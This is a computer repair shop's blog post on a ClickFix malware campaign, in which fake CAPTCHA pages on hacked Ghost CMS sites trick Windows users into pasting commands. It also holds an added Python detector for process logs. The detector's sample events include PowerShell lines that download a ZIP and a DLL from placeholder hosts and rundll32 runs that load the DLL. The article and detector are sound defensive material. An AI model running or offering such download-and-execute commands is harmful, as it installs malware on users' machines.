
Fake 'Verify You're Human' Pages on 700+ Hacked Sites Are Infecting Windows PCs

York Computer Repair

Security researchers disclosed this week that attackers have hijacked more than 700 legitimate websites — including Harvard, Oxford, Auburn University, and DuckDuckGo — and rigged them to push Windows malware through fake 'verify you're human' pop-ups. The catch: the malware only installs if the visitor copies and pastes a command into Windows themselves, which is exactly what the fake page tells them to do. It's a national story, but the trick works on any Windows PC, including ones in York County living rooms and small offices.

What happened

Researchers at XLab (the threat intelligence arm of Chinese security firm Qianxin) revealed that attackers are exploiting CVE-2026-26980, an SQL injection vulnerability in Ghost CMS's Content API that allows an unauthenticated attacker to read arbitrary data from the database — a flaw that was patched back in February 2026 in version 6.19.1. The problem is that thousands of websites never installed the patch.

In all, the campaign has compromised more than 700 websites, spanning universities, blockchain, artificial intelligence, software-as-a-service (SaaS), security research, media, and financial technology sectors — and the fact that legitimate websites have been breached could further increase the success rate of the attacks. According to the researchers, threat actors planted malicious code on the websites of Harvard University, Oxford University, Auburn University, and DuckDuckGo.

How the trick works on Windows users

This is a social-engineering attack known as 'ClickFix.' The injected script loads a second-stage ClickFix flow, presenting visitors with a fake Cloudflare or CAPTCHA verification dialog. Instead of a normal checkbox, the page instructs users to copy-paste a command into the Windows Run dialog or PowerShell, effectively tricking them into installing malware on their own systems.

The command acts as a dropper: it delivers a ZIP archive, extracts a Windows batch script from it, and runs that script. The script, in turn, executes a PowerShell command that downloads a DLL file from a remote domain, launches it using rundll32.exe, and opens a bogus web page as a distraction for the user. XLab has observed multiple payloads being used in these attacks, including DLL loaders, JavaScript droppers, and an Electron-based malware sample named UtilifySetup.exe.

Because the user types or pastes the command themselves, traditional antivirus often doesn't flag it until the payload actually lands — by which point the attacker may already have a foothold. If you suspect a machine has already executed one of these commands, getting it to a shop that can clean out malware and check for persistence is the safest move.
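The chain described above leaves a recognizable parent/child process trail that can be checked in process-creation logs. The following Python code is an added example, not from XLab or the original article; the event tuples, rule names, file names and `.invalid` hosts are constructed, and it assumes a command launched from the Run dialog appears as a child of explorer.exe.

```python
import re

URL = re.compile(r"https?://", re.I)
# Directories a standard user can write to (heuristic, not exhaustive).
USER_PATH = re.compile(r"\\(appdata|temp|downloads)\\|\$env:temp|%temp%", re.I)
POWERSHELL = {"powershell.exe", "pwsh.exe"}

def classify(parent, image, cmdline):
    """Return the ClickFix-stage heuristics one process-creation event matches."""
    parent, image = parent.lower(), image.lower()
    hits = []
    # Stage 1: shell launched from the Run dialog (child of explorer.exe)
    # with a URL already on its command line, i.e. a pasted downloader.
    if parent == "explorer.exe" and image in POWERSHELL | {"cmd.exe"} and URL.search(cmdline):
        hits.append("pasted-downloader")
    # Stage 2: batch script executed from a user-writable directory.
    if image == "cmd.exe" and re.search(r"\.(bat|cmd)\b", cmdline, re.I) and USER_PATH.search(cmdline):
        hits.append("batch-from-user-path")
    # Stage 3: PowerShell started by another script, fetching a DLL by URL.
    if (image in POWERSHELL and parent != "explorer.exe"
            and URL.search(cmdline) and re.search(r"\.dll\b", cmdline, re.I)):
        hits.append("dll-download")
    # Stage 4: rundll32 loading a DLL from a user-writable directory.
    if image == "rundll32.exe" and USER_PATH.search(cmdline):
        hits.append("rundll32-user-dll")
    return hits

def triage(events):
    """Map event index -> matched heuristics, skipping events with no hits."""
    return {i: h for i, ev in enumerate(events) if (h := classify(*ev))}

# Constructed (parent, image, command line) events, not real telemetry.
# Hosts use the reserved .invalid TLD; file names are placeholders.
EVENTS = [
    ("explorer.exe", "powershell.exe",
     r'powershell -c "iwr https://cdn.example.invalid/v.zip -OutFile $env:TEMP\v.zip"'),
    ("powershell.exe", "cmd.exe", r"cmd /c C:\Users\a\AppData\Local\Temp\v\run.bat"),
    ("cmd.exe", "powershell.exe",
     r'powershell -c "iwr https://files.example.invalid/x.dll -OutFile $env:TEMP\x.dll"'),
    ("powershell.exe", "rundll32.exe", r"rundll32.exe C:\Users\a\AppData\Local\Temp\x.dll,Start"),
    ("explorer.exe", "powershell.exe", "powershell.exe"),  # user opening a shell
    ("svchost.exe", "rundll32.exe", r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for idx, hits in triage(EVENTS).items():
        print(idx, EVENTS[idx][1], hits)
```

The four flagged events line up with the paste, batch script, DLL download and rundll32 launch; the plain PowerShell window and the System32 rundll32 call are left alone.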

Why this one is more dangerous than the average scam page

Most malware lures show up on shady websites. This one is different. This campaign is likely to be particularly effective because the instructions are framed as harmless technical steps such as 'verify you're human,' 'fix your connection,' or 'continue to the site' — and the content appears on websites users already trust.

Worse, the attack is hard to spot after the fact. Final payloads are often 'fileless,' meaning they're seldom written to disk as a Windows executable (.exe or .dll) file. Instead, they're loaded and launched in memory by living-off-the-land binaries (LOLBins), often as a .NET assembly or Common Language Runtime (CLR) module. Once a ClickFix payload is on a PC it can quietly steal saved browser passwords, banking sessions, and crypto wallets, or open the door to ransomware. If important files are encrypted or disappear afterward, a drive recovery may be the only way to get them back.

What to do right now

The single most important rule: never run code or commands copied from websites, emails, or messages unless you trust the source and understand the action's purpose. Specifically, if any web page ever asks you to press Windows+R, open PowerShell, or paste something into the Command Prompt to 'prove you're human' or 'fix' a page — close the tab. That is never a legitimate request.

A few other practical steps:

- Run a full Microsoft Defender scan today, especially if anyone in the household has clicked through CAPTCHA-style prompts recently.
- Change passwords for banking, email, and any site you've logged into in the past month from the affected machine — and turn on multi-factor authentication where you can.
- Check Task Scheduler and the Startup tab in Task Manager for entries you don't recognize. ClickFix payloads frequently add persistence here.
- If the PC has been acting strange — pop-ups, browser redirects, unfamiliar processes, or sluggish performance — bring it in for a hands-on diagnostic rather than hoping it clears up.

What This Means for York, PA

York County residents and small businesses are squarely in the target zone for this one — the compromised sites include major universities and a popular search engine, so anyone in the area browsing normally could land on a poisoned page. If you've pasted any 'verification' command into Windows in the last few weeks, bring the PC into York Computer Repair at 2069 Carlisle Rd so we can scan it and confirm nothing was left behind.
